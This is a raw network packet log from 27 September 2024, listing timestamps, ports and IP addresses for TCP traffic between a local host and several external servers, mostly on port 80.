Sep 27, 2024 04:21:17.512249947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512258053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.512262106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512271881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512274027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512285948 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.512290955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512296915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512309074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512319088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512321949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.512330055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512341976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512343884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512353897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512365103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512375116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512378931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512393951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512403965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512404919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512417078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.512455940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512759924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512773037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512784004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512794018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512805939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512816906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512816906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512828112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512840033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512871027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512880087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512895107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512907028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512917042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512929916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512939930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512948036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512958050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512959003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512974024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512985945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512996912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.513004065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.513016939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.513024092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.513030052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.513041973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513045073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.513053894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513066053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513077021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513087034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.513087988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513099909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513112068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513117075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513123035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513142109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513147116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513159037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513170958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513174057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513183117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513201952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513201952 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513212919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513214111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513225079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513236046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513247013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513256073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513257980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513271093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513282061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513287067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513293982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513309002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513313055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513325930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513329029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513338089 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513349056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513350964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513360023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513371944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513382912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513394117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513401031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513406992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513418913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513428926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513437986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513439894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513453007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513461113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513483047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513504028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513839960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513853073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513869047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513880968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513891935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513901949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.513907909 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.513947964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514008045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514019966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514030933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514040947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514051914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514055967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514062881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514074087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514086008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514091969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514132023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514143944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514154911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514158964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514173031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514183998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514197111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514200926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514209032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514219046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514221907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514230013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.514230967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514241934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514251947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514262915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514272928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514280081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.514281988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514291048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514302969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514309883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514313936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514326096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514333010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514338970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514349937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514359951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514365911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514372110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514384031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514394045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514408112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514414072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514419079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514430046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514432907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514440060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514446020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514457941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514463902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514471054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514482975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514489889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514494896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514508963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514508963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514519930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514532089 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514542103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.514549971 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514553070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514564037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514575958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514580011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.514586926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514604092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.514622927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.514956951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514969110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514980078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.514991045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515002966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515005112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.515043020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.515105963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515125036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515136003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515146971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.515156984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515166998 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515171051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.515183926 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515197039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515201092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.515204906 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.515208960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515219927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515229940 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515240908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515249968 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.515250921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.515261889 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:17.515270948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.515290022 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.519463062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519521952 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519530058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519548893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519561052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519571066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519573927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519583941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519594908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519601107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519649029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519682884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519695044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519705057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519721985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519732952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519742012 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519743919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519756079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519767046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.519785881 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.519809008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.520252943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520344973 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520354986 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520365000 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520375013 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520385027 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520387888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.520387888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.520395994 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520450115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.520450115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.520891905 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520903111 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520914078 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520967007 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.520987034 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.520997047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521008968 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521024942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521034002 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521034002 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521034956 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521045923 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521058083 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521068096 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521078110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521110058 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521110058 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521372080 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521414995 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521425962 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521451950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521451950 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521492958 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521505117 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521512985 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521516085 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521528006 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521542072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521554947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521564960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.521569967 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.521569967 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522144079 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522161007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522161961 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522171974 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522181988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522192955 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522231102 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522232056 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522479057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522525072 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522592068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522603035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522615910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522625923 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522636890 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522650003 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522676945 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522676945 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522944927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522962093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522972107 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.522972107 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.522989035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523000956 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523010969 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523020983 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523034096 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523034096 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523097038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523108006 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523118973 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523128986 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523139000 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523139954 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523139954 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523149014 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523175955 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523890018 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523901939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523909092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523911953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523945093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523955107 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523964882 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.523969889 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523969889 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.523977041 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524048090 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524059057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524064064 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.524070978 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524087906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524097919 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524110079 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524122953 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.524122953 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.524838924 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524851084 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524857044 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.524861097 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524878979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524888992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524899960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524910927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.524920940 CEST	49722	80	192.168.2.5	185.215.113.17
